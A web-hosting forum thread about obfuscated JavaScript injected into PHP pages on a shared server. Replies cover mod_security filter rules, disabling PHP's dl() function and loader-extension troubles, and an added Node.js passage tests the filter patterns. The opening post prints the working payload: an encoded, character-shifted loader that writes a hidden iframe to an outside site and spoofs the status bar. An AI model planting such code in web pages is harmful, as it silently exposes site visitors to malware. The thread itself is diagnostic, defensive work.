Recurring PHP malicious document.write exploit

mousepotatoe

Active Member
Dec 17, 2003
On my server, several sites (but not all) are having this code inserted into PHP pages, mainly index.php, header.php or footer.php.

I cannot locate the source of this exploit.

Is anyone familiar with this? Code follows:

Code:
<script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%74%3E%0D%0A'));dF('%286FLIUDPH%2853%2853vuf%286G%2855kwws%286D22zzz1vn%7Cv1frp2nlso1sks%2855%2853zlgwk%286G5%2853khljkw%286G5%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh%2855%286H%286F2LIUDPH%286H3')
</script>
Any help would be greatly appreciated.
 

DigitalN

Well-Known Member
Sep 23, 2004
Mod security will block the requests that you filter, but the real issue is probably that the malicious PHP module is still being loaded via the dl() function.

Just edit your php.ini file and change

enable_dl = yes

to
enable_dl = no

And restart Apache - the problem won't reoccur then.
 

mousepotatoe

Active Member
Dec 17, 2003
HostMerit said:
I'd suggest mod_security, and my mod security ruleset that contains things to block such as this - http://www.hostmerit.com/modsec.user.conf


To block those with modsec,
SecFilter "document\.write"
SecFilterSelective THE_REQUEST "<script>"

My script contains around 30+ Javascript + XML cross site scripting code blocks.
That's a wonderful mod_security ruleset, and thank you for writing the lines:

SecFilter "document\.write"
SecFilterSelective THE_REQUEST "<script>"

I have added this to my modsec ruleset, but the malicious code is creating
"<script language=javascript>"

Would this mod_security rule recognize <script language=javascript> as <script>?

Thanks!
 

mousepotatoe

Active Member
Dec 17, 2003
enable_dl = no blocks ioncube

DigitalN said:
Mod security will block the requests that you filter, but the real issue is probably that the malicious PHP module is still being loaded via the dl() function.

Just edit your php.ini file and change

enable_dl = yes

to
enable_dl = no

And restart Apache - the problem won't reoccur then.
If I change enable_dl = no, all my ioncube sites go down; it will not allow ioncube to load any of my ioncube encrypted sites. Is there a workaround for this?

Thank you!
 

Etheral

Well-Known Member
Dec 8, 2003
mousepotatoe said:
That's a wonderful mod_security ruleset, and thank you for writing the lines:

SecFilter "document\.write"
SecFilterSelective THE_REQUEST "<script>"

I have added this to my modsec ruleset, but the malicious code is creating
"<script language=javascript>"

Would this mod_security rule recognize <script language=javascript> as <script>?

Thanks!

You might NOT want to block JavaScript like that; some people use JavaScript to give their website a more interactive feel...
 

HostMerit

Well-Known Member
Oct 24, 2004
Etheral said:
You might NOT want to block JavaScript like that; some people use JavaScript to give their website a more interactive feel...
You have no idea what you're talking about. I suggest you find out what mod_security is, and why the comment you made makes no sense. It blocks URL requests, not page code. :rolleyes: :rolleyes:
 
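mousepotatoe's question (whether a filter written as "<script>" also catches "<script language=javascript>") and HostMerit's point that these rules inspect requests rather than the served page can both be checked mechanically. The following is an added Node.js example (my own code, not ModSecurity itself and not from the posted ruleset) that treats the two posted patterns as regular expressions, runs them against constructed request lines, and adds a broader pattern for comparison. Assumptions, stated here and in the comments: patterns are PCRE-style regexes matched case-insensitively against the percent-decoded request, which is a simplification of the real engine, and the request lines are constructed samples.

```javascript
// Added example: what the two posted SecFilter patterns match, treated as regexes
// against request lines (not against file contents on disk). Run with: node secfilter_check.js

// The two rules from the thread plus one broader pattern. The third is my own suggestion;
// it is not from the posted ruleset.
const RULES = [
  { name: 'SecFilter "document\\.write"',              pattern: "document\\.write" },
  { name: 'SecFilterSelective THE_REQUEST "<script>"', pattern: "<script>" },
  { name: 'broader (not in the thread): "<script[^>]*>"', pattern: "<script[^>]*>" },
];

// Percent-decode the request the way a WAF normalises it before matching (assumption:
// a single decoding pass; fall back to the legacy unescape() on malformed sequences).
function normalize(requestLine) {
  try {
    return decodeURIComponent(requestLine);
  } catch (e) {
    return unescape(requestLine);
  }
}

// Return the names of every rule whose pattern matches the normalised request.
// Case-insensitive matching is an assumption about the engine, not a documented fact.
function matchRules(requestLine, rules = RULES) {
  const text = normalize(requestLine);
  return rules.filter((r) => new RegExp(r.pattern, "i").test(text)).map((r) => r.name);
}

// Constructed sample requests: one benign, one with a bare <script>, one carrying the
// injected snippet's opening tag URL-encoded, and one POST with the tag in the body.
const SAMPLE_REQUESTS = [
  "GET /index.php?page=home HTTP/1.1",
  "GET /index.php?q=<script>alert(1)</script> HTTP/1.1",
  "GET /index.php?q=%3Cscript%20language%3Djavascript%3Edocument.write(1)%3C/script%3E HTTP/1.1",
  "POST /footer.php HTTP/1.1 body=<script language=javascript>x=1</script>",
];

for (const req of SAMPLE_REQUESTS) {
  console.log(req);
  console.log("  matched:", matchRules(req).length ? matchRules(req).join(" | ") : "(none)");
}
```

Run against these samples, the literal "<script>" pattern only fires on the bare tag; the request carrying "<script language=javascript>" slips past it and is caught only because the same request also contains "document.write", or by the broader "<script[^>]*>" pattern. None of this touches the code already sitting in index.php or footer.php on disk: a request-side filter can stop a new injection attempt that arrives over HTTP, but the files that are already modified still have to be cleaned.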

DigitalN

Well-Known Member
Sep 23, 2004
Yes,

enable_dl = Off

is what you want - I was working from memory; it's as simple as that to disable this exploit.

Enabling dl() makes your server vulnerable to any account loading a rogue module into PHP - load ioncube and any other legitimate modules (such as SourceGuardian) into php.ini yourself, as someone mentioned.
 

mousepotatoe

Active Member
Dec 17, 2003
Disabled dl() and can't run SourceGuardian

Disabling the dl() function is wreaking havoc on many of my websites. I had to load ioncube into the php.ini and got past that, and have added SourceGuardian to php.ini but am getting the following error.

One or more errors are fatal due to the fact that they disable the ability to load the Source Guardian loader:
Your system has the "dl()" function disabled.
This error is fatal and will prevent you from using this plugin. To access the rest of your plugins remove this plugin from your server.
I have tried

[Zend]
extension=/home/ixed/ixed.4.4.lin
zend_extension = /home/ioncube/ioncube_loader_lin_4.4.so
zend_optimizer.optimization_level=15
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-2_6_2
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-2_6_2
zend_optimizer.version=2.6.2
and
extension=/home/ixed/ixed.4.4.lin
[Zend]
zend_extension = /home/ioncube/ioncube_loader_lin_4.4.so
zend_optimizer.optimization_level=15
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-2_6_2
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-2_6_2
zend_optimizer.version=2.6.2
with no luck.
Any suggestions?

Thank you